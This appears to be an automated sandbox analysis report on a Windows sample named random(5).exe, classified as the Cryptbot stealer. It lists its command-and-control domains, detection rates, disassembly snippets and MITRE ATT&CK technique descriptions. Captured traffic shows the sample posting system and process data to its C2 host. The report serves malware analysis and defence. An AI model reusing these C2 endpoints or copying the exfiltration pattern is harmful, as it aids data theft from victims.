Opcode Fuzzy Hash: 0f6b83174836d4b714a2f53ddde704749e29f50ca3ac93b86cbeb897ba78edf7
Instruction Fuzzy Hash: 1BB148B19083916BDF399A24C8907BFBBD8EB5530CF18292FF8C5E6181F725C8449752

Source: KvgPhome.fortth14vs.top	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZ0	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963	Avira URL Cloud: Label: malware
Source: .1.1home.fortth14vs.top	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0	Avira URL Cloud: Label: malware
Source: home.fortth14vs.top	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZ	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZT	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse	Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\random(5).exe	Code function: -----BEGIN PUBLIC KEY-----		0_2_00E5DCF0
Source: random(5).exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: Malware configuration extractor	URLs: KvgPhome.fortth14vs.top
Source: Malware configuration extractor	URLs: .for8014vs.top
Source: Malware configuration extractor	URLs: home.fortth14vs.top
Source: Malware configuration extractor	URLs: .1.1home.fortth14vs.top
Source: Malware configuration extractor	URLs: .forth14vs.top
Source: Malware configuration extractor	URLs: fortth14vsh14vs.top

Source: Joe Sandbox View	IP Address: 34.147.147.173 34.147.147.173
Source: Joe Sandbox View	IP Address: 34.200.57.114 34.200.57.114

Source: random(5).exe	Virustotal: Detection: 48%			Perma Link
Source: random(5).exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [ebp+04h], 424D53FFh	0_2_00E9A5B0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00E9A7F0
Source: C:\Users\user\Desktop\random(5).exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00E9B560

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: /Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: /
Source: global traffic	HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14vs.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random(5).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
random(5).exe

Function 00E3255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Function 00E329FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 00E405B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Function 00EFB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 00EF9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Function 00E68B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Function 00E32F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Function 00E376A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Function 00E69290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 00E37770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 00E375E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 06E70AD2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137
COMMON

Function 06E70AAD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Function 00E6A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 00E4D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre